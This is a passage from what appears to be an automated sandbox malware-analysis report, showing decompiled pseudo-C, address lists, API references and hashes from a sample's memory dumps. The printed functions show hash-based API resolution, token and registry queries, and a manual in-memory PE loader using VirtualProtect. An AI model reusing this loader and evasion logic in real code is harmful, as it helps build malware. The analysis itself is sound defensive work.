								__eflags = _t393;
								if(_t393 == 0) {
									E6EB60FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6EB6306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6EB60FD4(_t403, _t413, _t403);
								}
								E6EB5F654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6EB5BB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6EB5BB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6eb6073f
0x6eb60741
0x6eb60748
0x6eb60fc7
0x6eb60fcd
0x6eb60fcd
0x6eb60752
0x6eb6075e
0x6eb6076a
0x6eb6076f
0x6eb6077c
0x6eb6078d
0x6eb6078f
0x6eb60790
0x6eb60791
0x6eb60791
0x6eb60792
0x6eb60796
0x6eb6079a
0x6eb6079f
0x6eb607a2
0x6eb607a8
0x6eb607c2
0x6eb607c9
0x6eb607cc
0x6eb607cf
0x6eb607d1
0x6eb607dd
0x6eb607ea
0x6eb607f7
0x6eb607fb
0x6eb60887
0x6eb60887
0x6eb60889
0x6eb6088d
0x6eb60898
0x6eb608ae
0x6eb608b1
0x6eb608b1
0x6eb608b5
0x6eb608be
0x6eb608c3
0x6eb608c3
0x6eb608c5
0x6eb608d6
0x6eb608f8
0x6eb608fa
0x6eb608fb
0x6eb608ff
0x6eb608ff
0x6eb60908
0x6eb60914
0x6eb6091d
0x6eb60933
0x6eb60943
0x6eb60948
0x6eb6094c
0x6eb60951
0x6eb60953
0x6eb609a3
0x6eb609b8
0x6eb609bc
0x6eb609c1
0x6eb609d2
0x6eb609e7
0x6eb609eb
0x6eb609f0
0x6eb609f2
0x6eb60a39
0x6eb60a3c
0x6eb60a8a
0x6eb60a8d
0x6eb60ace
0x6eb60ad2
0x6eb60ad7
0x6eb60adc
0x6eb60afb
0x6eb60afb
0x6eb60afb
0x6eb60afd
0x00000000
0x6eb60afd
0x6eb60ade
0x6eb60ae2
0x6eb60ae4
0x6eb60aeb
0x6eb60aeb
0x6eb60af1
0x6eb60af1
0x6eb60af3
0x6eb60af6
0x6eb60af6
0x00000000
0x6eb60af3
0x6eb60ae6
0x6eb60ae9
0x6eb60aef
0x6eb60aef
0x00000000
0x6eb60aef
0x00000000
0x6eb60ae9
0x6eb60a8f
0x6eb60a92
0x00000000
0x00000000
0x6eb60a98
0x6eb60a9d
0x6eb60aa2
0x6eb60ac1
0x6eb60ac1
0x6eb60acb
0x00000000
0x6eb60acb
0x6eb60aa4
0x6eb60aa8
0x6eb60aaa
0x6eb60ab1
0x6eb60ab1
0x6eb60ab7
0x6eb60ab7
0x6eb60ab9
0x6eb60abc
0x6eb60abc
0x00000000
0x6eb60ab9
0x6eb60aac
0x6eb60aaf
0x6eb60ab5
0x6eb60ab5
0x00000000
0x6eb60ab5
0x00000000
0x6eb60aaf
0x6eb60a3e
0x6eb60a40
0x6eb60a7f
0x6eb60a82
0x6eb60df4
0x6eb60df9
0x6eb60dfe
0x6eb60e1d
0x6eb60e1d
0x6eb60e27
0x00000000
0x6eb60e27
0x6eb60e00
0x6eb60e04
0x6eb60e06
0x6eb60e0d
0x6eb60e0d
0x6eb60e13
0x6eb60e13
0x6eb60e15
0x6eb60e18
0x6eb60e18
0x00000000
0x6eb60e15
0x6eb60e08
0x6eb60e0b
0x6eb60e11
0x6eb60e11
0x00000000
0x6eb60e11
0x00000000
0x6eb60e0b
0x00000000
0x6eb60a88
0x6eb60a46
0x6eb60a4b
0x6eb60a50
0x6eb60a6f
0x6eb60a6f
0x6eb60a79
0x00000000
0x6eb60a79
0x6eb60a52
0x6eb60a56
0x6eb60a58
0x6eb60a5f
0x6eb60a5f
0x6eb60a65
0x6eb60a65
0x6eb60a67
0x6eb60a6a
0x6eb60a6a
0x00000000
0x6eb60a67
0x6eb60a5a
0x6eb60a5d
0x6eb60a63
0x6eb60a63
0x00000000
0x6eb60a63
0x00000000
0x6eb60a5d
0x6eb609f4
0x6eb609f6
0x00000000
0x00000000
0x6eb60a00
0x6eb60a05
0x6eb60a0a
0x6eb60a29
0x6eb60a29
0x6eb60a33
0x00000000
0x6eb60a33
0x6eb60a0c
0x6eb60a10
0x6eb60a12
0x6eb60a19
0x6eb60a19
0x6eb60a1f
0x6eb60a1f
0x6eb60a21
0x6eb60a24
0x6eb60a24
0x00000000
0x6eb60a21
0x6eb60a14
0x6eb60a17
0x6eb60a1d
0x6eb60a1d
0x00000000
0x6eb60a1d
0x00000000
0x6eb60a17
0x6eb60959
0x6eb6095e
0x6eb60963
0x6eb60982
0x6eb60982
0x6eb6098c
0x00000000
0x6eb6098c
0x6eb60965
0x6eb60969
0x6eb6096b
0x6eb60972
0x6eb60972
0x6eb60978
0x6eb60978
0x6eb6097a
0x6eb6097d
0x6eb6097d
0x00000000
0x6eb6097a
0x6eb6096d
0x6eb60970
0x6eb60976
0x6eb60976
0x00000000
0x6eb60976
0x00000000
0x6eb6089a
0x6eb6089c
0x6eb60b01
0x6eb60b06
0x6eb60b09
0x6eb60b0e
0x6eb60b10
0x6eb60b25
0x6eb60b28
0x6eb60bf6
0x6eb60bfe
0x6eb60c01
0x6eb60c16
0x6eb60c20
0x6eb60c20
0x6eb60c22
0x6eb60c24
0x6eb60c33
0x6eb60c3f
0x6eb60c43
0x6eb60c46
0x6eb60c49
0x6eb60c4c
0x00000000
0x6eb60c4c
0x6eb60b38
0x6eb60b4a
0x6eb60b4e
0x6eb60bda
0x6eb60bda
0x6eb60be0
0x6eb60beb
0x6eb60be2
0x6eb60be2
0x6eb60be2
0x00000000
0x6eb60be0
0x6eb60b5b
0x6eb60b5c
0x6eb60b5e
0x6eb60b64
0x6eb60fb3
0x6eb60fb8
0x6eb60fba
0x00000000
0x00000000
0x6eb60fc0
0x6eb60b7b
0x6eb60b7f
0x6eb60b84
0x6eb60b96
0x6eb60b9a
0x6eb60ba5
0x6eb60ba6
0x6eb60ba7
0x6eb60ba8
0x6eb60baa
0x6eb60bb5
0x6eb60e2d
0x6eb60e2d
0x6eb60bb5
0x6eb60bbb
0x6eb60bc4
0x6eb60e3f
0x6eb60e55
0x6eb60e57
0x6eb60e59
0x6eb60f94
0x6eb60f9b
0x00000000
0x6eb60f9b
0x6eb60e68
0x6eb60e76
0x6eb60e90
0x6eb60e92
0x6eb60e94
0x6eb60fa5
0x6eb60faa
0x6eb60fac
0x00000000
0x00000000
0x6eb60fae
0x6eb60ea8
0x6eb60eb3
0x6eb60ec2
0x6eb60ed4
0x6eb60ed6
0x6eb60ed8
0x6eb60ee5
0x6eb60ee5
0x6eb60ef5
0x6eb60f06
0x6eb60f0b
0x6eb60f0d
0x6eb60f0f
0x6eb60f16
0x6eb60f17
0x6eb60f17
0x6eb60f23
0x6eb60f44
0x6eb60f4d
0x6eb60f59
0x6eb60f65
0x6eb60f6a
0x6eb60f6f
0x6eb60f75
0x6eb60f75
0x6eb60f7a
0x6eb60f80
0x00000000
0x6eb60f86
0x6eb60f88
0x00000000
0x6eb60f88
0x6eb60bca
0x6eb60bca
0x6eb60bcf
0x6eb60bd5
0x6eb60bd5
0x00000000
0x6eb60bcf
0x6eb60bc4
0x6eb60898
0x6eb60808
0x6eb60809
0x6eb6080b
0x6eb60811
0x6eb60dde
0x6eb60de3
0x6eb60de5
0x00000000
0x00000000
0x6eb60deb
0x6eb60828
0x6eb6082c
0x6eb60831
0x6eb60847
0x6eb6085e
0x6eb60862
0x6eb60c5a
0x6eb60c5a
0x6eb60862
0x6eb60868
0x6eb60871
0x6eb60c69
0x6eb60c7a
0x6eb60c7f
0x6eb60c81
0x6eb60c83
0x6eb60db4
0x6eb60db8
0x00000000
0x6eb60db8
0x6eb60c8f
0x6eb60cb4
0x6eb60cb6
0x6eb60cb8
0x6eb60dd0
0x6eb60dd5
0x6eb60dd7
0x00000000
0x00000000
0x6eb60dd9
0x6eb60cc9
0x6eb60cd7
0x6eb60cde
0x6eb60cdf
0x6eb60ce0
0x6eb60cf2
0x6eb60cf4
0x6eb60cf6
0x00000000
0x00000000
0x6eb60cfe
0x6eb60d19
0x6eb60d1b
0x6eb60d1d
0x6eb60dc2
0x6eb60dc7
0x6eb60dc9
0x00000000
0x00000000
0x6eb60dcb
0x6eb60d23
0x6eb60d2a
0x6eb60d2e
0x6eb60d99
0x6eb60d99
0x6eb60d9b
0x6eb60da2
0x6eb60da2
0x6eb60da8
0x6eb60da8
0x6eb60daa
0x6eb60daf
0x6eb60daf
0x00000000
0x6eb60daa
0x6eb60d9d
0x6eb60da0
0x6eb60da6
0x6eb60da6
0x00000000
0x6eb60da6
0x00000000
0x6eb60da0
0x6eb60d30
0x6eb60d30
0x6eb60d32
0x6eb60d3e
0x6eb60d43
0x6eb60d45
0x00000000
0x00000000
0x6eb60d47
0x6eb60d4b
0x6eb60d52
0x6eb60d53
0x6eb60d54
0x6eb60d56
0x00000000
0x00000000
0x6eb60d58
0x6eb60d5a
0x6eb60d61
0x6eb60d61
0x6eb60d67
0x6eb60d67
0x6eb60d69
0x6eb60d6e
0x6eb60d6e
0x6eb60d77
0x6eb60d7c
0x6eb60d81
0x6eb60d87
0x6eb60d87
0x6eb60d8c
0x00000000
0x6eb60d8c
0x6eb60d5c
0x6eb60d5f
0x6eb60d65
0x6eb60d65
0x00000000
0x6eb60d65
0x00000000
0x6eb60d93
0x6eb60d93
0x6eb60d94
0x6eb60d94
0x00000000
0x6eb60d32
0x6eb60877
0x6eb6087c
0x6eb60882
0x6eb60882
0x00000000
0x6eb60c59
0x6eb60c59
0x6eb60c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6EB6085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6EB60C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6EB60CB4

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: b80cd528c4a98f388103aaba064d05f23328d0c88b6173390cd433cb7f2f9609
Instruction ID: 4c43fb36bf7b08614f2062d01f0c0b55644925658a8c84bdfe3bf1bccb43d1c2
Opcode Fuzzy Hash: b80cd528c4a98f388103aaba064d05f23328d0c88b6173390cd433cb7f2f9609
Instruction Fuzzy Hash: 4C22D5705183C1AEEB71DBA6C850BEF7FA9EF81308F10891DE99457295EB31D805CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6EB62234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6EB62234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6EB63AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6EB6306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6eb62234
0x6eb62238
0x6eb62254
0x6eb62257
0x6eb6223a
0x6eb62249
0x6eb6224c
0x6eb6224c
0x6eb62267
0x6eb6226c
0x6eb62270
0x6eb62278
0x6eb62278
0x6eb6227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6EB54B17,00000000,00000000,?), ref: 6EB62278

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: 7f8555c30615ce11fb2cfc742592e2ddcfac99cec6deed9792d3825e36dc49ee
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: 7EE06DB060E342ADFB449BA99C04B6F3BD8AFC5710F208A2CB468D7284EA70D8418761

Uniqueness

Uniqueness Score: -1.00%

Function 6EB62820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EB62820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6EB6306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6eb62827
0x6eb62830
0x6eb6283e
0x6eb62861
0x6eb62861
0x6eb62840
0x6eb62857
0x6eb6285b
0x00000000
0x6eb6285d
0x6eb6285d
0x6eb6285d
0x6eb6285b
0x6eb62866

APIs

NtAllocateVirtualMemory.NTDLL(6EB688E6,?,00000000,000000FF,6EB688E6,6EB688E6,60A28C5C,60A28C5C,?,?,6EB688E6,00003000,00000004,000000FF), ref: 6EB62857

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: dd067b88be8785cced6dbeb0184eaedc9654231689592a471efe7eb8714b2a88
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: E6E03971209382AFFB09CA99CD24E6FBBE9EFC4604F108C2DB494C6250D730D8009721

Uniqueness

Uniqueness Score: -1.00%

Function 6EB63138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6EB63138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6EB634B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6eb63138
0x6eb6313d
0x6eb6313f
0x6eb63141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6EB634B0,6EB63128,60A28C5C,60A28C5C,?,6EB56C99,00000000), ref: 6EB6313F

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 8ccea8d4fa4adce5faa5c193647c0e108d3e1305a6001517208cba4a12284b4a
Instruction ID: c1dc5e89c50f2872622467fb106e2b0d0b96ed2cd080839d56622096662faae7
Opcode Fuzzy Hash: 8ccea8d4fa4adce5faa5c193647c0e108d3e1305a6001517208cba4a12284b4a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02802092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E02802092(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				int _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t140;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t183;
				intOrPtr _t226;
				void* _t233;
				intOrPtr _t236;
				void* _t243;
				intOrPtr* _t247;
				unsigned int _t250;
				intOrPtr _t259;
				DWORD* _t271;
				void* _t275;
				intOrPtr* _t278;
				intOrPtr* _t279;

				_t140 = _a4;
				_v20 = 0;
				_t243 =  *((intOrPtr*)(_t140 + 0x44));
				 *0x2804418 = 1;
				asm("movaps xmm0, [0x2803010]");
				asm("movups [0x2804428], xmm0");
				_v48 = _t140;
				_v52 =  *((intOrPtr*)(_t140 + 0x48));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v188 = _t243;
				_v184 =  *((intOrPtr*)(_v48 + 0x58));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_t140 + 0x54));
				_v64 = 4;
				_v68 = _t243;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t271); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x58));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E02801770();
				E028017BD(_v68,  *((intOrPtr*)(_v48 + 0x28)), _v56);
				E02801770( *((intOrPtr*)(_v48 + 0x28)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t278 = _t275 - 0x8c;
				_t233 = _v68;
				_t259 =  *((intOrPtr*)(_t233 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t233;
				_v108 = _t259;
				if(_t259 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v120 = _v104;
				if(_v60 != 0) {
					_v124 = 0;
					_v128 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v128;
						_t250 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t250 >> 0x1f;
						_v148 =  *((intOrPtr*)(_v140 + 8));
						_v188 = _v68 +  *((intOrPtr*)(_v140 + 0xc));
						_v184 = _v148;
						_v180 =  *((intOrPtr*)(0x2804418 + ((_t250 >> 0x0000001e & 0x00000001) << 4) + (_v144 << 3) + ((_t250 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v124;
						_t183 = VirtualProtect(??, ??, ??, ??); // executed
						_t278 = _t278 - 0x10;
						_t226 = _v152 + 1;
						_v156 = _t183;
						_v124 = _t226;
						_v128 = _v140 + 0x28;
						if(_t226 == _v60) {
							goto L8;
						}
					}
				}
				L8:
				 *_t278 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x24));
				_t159 = DisableThreadLibraryCalls(??);
				_t279 = _t278 - 4;
				_t236 =  *_v100;
				_v136 = _t159;
				_v112 = _t236;
				_v116 = _v68;
				if(_t236 != 0) {
					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t247 = _v48;
				_v44 =  *((intOrPtr*)(_t247 + 0x50));
				_v40 =  *_t247;
				_v36 =  *((intOrPtr*)(_t247 + 0x18));
				_v32 =  *((intOrPtr*)(_t247 + 0x4c));
				_v28 =  *((intOrPtr*)(_t247 + 0x10));
				_v24 = _v132;
				 *_t279 = _t247;
				_v188 = 0;
				_v184 = 0x60;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x60;
				_v172 =  *((intOrPtr*)(_v116 + 0x28));
				E02801770();
				if(_v172 != 0) {
					_t279 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x0280209e
0x028020ac
0x028020b3
0x028020b6
0x028020c0
0x028020c7
0x028020d1
0x028020d7
0x028020e0
0x028020e9
0x028020ec
0x028020f0
0x028020f8
0x028020ff
0x02802102
0x02802105
0x02802108
0x0280210b
0x02802125
0x0280212b
0x0280212e
0x02802136
0x0280213a
0x0280213d
0x02802140
0x02802143
0x02802146
0x02802162
0x0280217f
0x028021a4
0x028021a6
0x028021af
0x028021b2
0x028021bc
0x028021bf
0x028021c2
0x028021c5
0x028021c8
0x02802216
0x02802216
0x02802249
0x0280224c
0x0280225c
0x0280225f
0x028022a8
0x028022a8
0x028022b7
0x028022bf
0x028022cd
0x028022dc
0x0280230d
0x02802316
0x0280231a
0x0280231e
0x02802325
0x0280232b
0x0280232d
0x02802336
0x02802347
0x0280234d
0x02802350
0x02802353
0x00000000
0x00000000
0x02802359
0x028022a8
0x02802264
0x02802272
0x0280227a
0x0280227d
0x0280227f
0x02802285
0x02802291
0x02802297
0x0280229a
0x0280229d
0x028021f9
0x028021f9
0x0280236e
0x02802374
0x02802379
0x0280237f
0x02802385
0x0280238b
0x02802391
0x02802394
0x02802397
0x0280239f
0x028023a7
0x028023ad
0x028023b3
0x028023b9
0x028023bf
0x028023cd
0x028021da
0x028021e0
0x028021e0
0x02802234

APIs

VirtualProtect.KERNELBASE ref: 0280210B
VirtualProtect.KERNELBASE ref: 028021A4
VirtualProtect.KERNELBASE ref: 0280232B

Strings

`, xrefs: 0280239F

Memory Dump Source

Source File: 00000001.00000002.821406610.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: 5c7d1bd46e35d1b133ebbd8c8169d420f76e2e3593583b9ecaa4cb4f7c5d2b24
Instruction ID: 9412164fdd14cbc328e909506d82ec3e997cce491e88ad66c82c051ffc65e22f
Opcode Fuzzy Hash: 5c7d1bd46e35d1b133ebbd8c8169d420f76e2e3593583b9ecaa4cb4f7c5d2b24
Instruction Fuzzy Hash: BDB1BEB9E00218CFCB54CF99C884A9DFBF1BF88314F15856AE958AB355D730A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6EB610A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6EB610A4(void* __ebx, void* __ecx) {
				intOrPtr* _t34;
				long* _t55;
				long* _t59;
				intOrPtr* _t64;
				void* _t73;
				void* _t74;
				void* _t79;
				long* _t80;

				_t74 = __ecx;
				_t80[7] = 0;
				_t64 = E6EB6306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t64 != 0) {
					 *_t64(_t74, 8,  &(_t80[7]));
				}
				_t55 = _t80;
				 *_t55 = _t80[7];
				_t55[1] = 1;
				if(E6EB5C280(_t55) != 0) {
					L6:
					if(_t80[1] != 0) {
						E6EB5BB44(_t80);
					}
					return 0;
				}
				_t80[6] = 0;
				if(E6EB6306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
					GetTokenInformation(_t80[4], 0x19, 0, 0,  &(_t80[6])); // executed
				}
				_t30 = _t80[6];
				if(_t80[6] != 0) {
					E6EB5F584( &(_t80[3]), _t30);
					_t59 =  &(_t80[3]);
					_t73 = E6EB5F4BC(_t59, 0);
					_t34 = E6EB6306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
					if (_t34 == 0) goto L33;
					 *_t34 =  *_t34 + _t34;
					 *((intOrPtr*)(_t79 + 0x50182444)) =  *((intOrPtr*)(_t79 + 0x50182444)) + _t59;
				} else {
					goto L6;
				}
			}

0x6eb610b3
0x6eb610b5
0x6eb610c4
0x6eb610c8
0x6eb610d2
0x6eb610d2
0x6eb610d8
0x6eb610db
0x6eb610dd
0x6eb610e8
0x6eb61122
0x6eb61127
0x6eb6112c
0x6eb6112c
0x00000000
0x6eb61131
0x6eb610f4
0x6eb61107
0x6eb61118
0x6eb61118
0x6eb6111a
0x6eb61120
0x6eb6113e
0x6eb61145
0x6eb6114e
0x6eb6115c
0x6eb61165
0x6eb61168
0x6eb6116a
0x00000000
0x00000000
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6EB61118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6EB6117B

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction ID: 6a98c1cef54ba0acdcc29e3237ca47d29428811f229a5c7c00cd7ff43473c3b5
Opcode Fuzzy Hash: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction Fuzzy Hash: 944104716442C36AEB55DAE8DC60BAF7FEDEB82300F188838F558DA194DB20C84DC751

Uniqueness

Uniqueness Score: -1.00%

Function 6EB657B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6EB657B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6EB63064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6EB5F828(_a8, _t15);
							if(E6EB63064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6EB5F4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6eb657b8
0x6eb657b9
0x6eb657bb
0x6eb657c0
0x6eb657c7
0x6eb657cb
0x6eb657cb
0x6eb657cb
0x6eb657cf
0x6eb65815
0x6eb65815
0x6eb657d1
0x6eb657d1
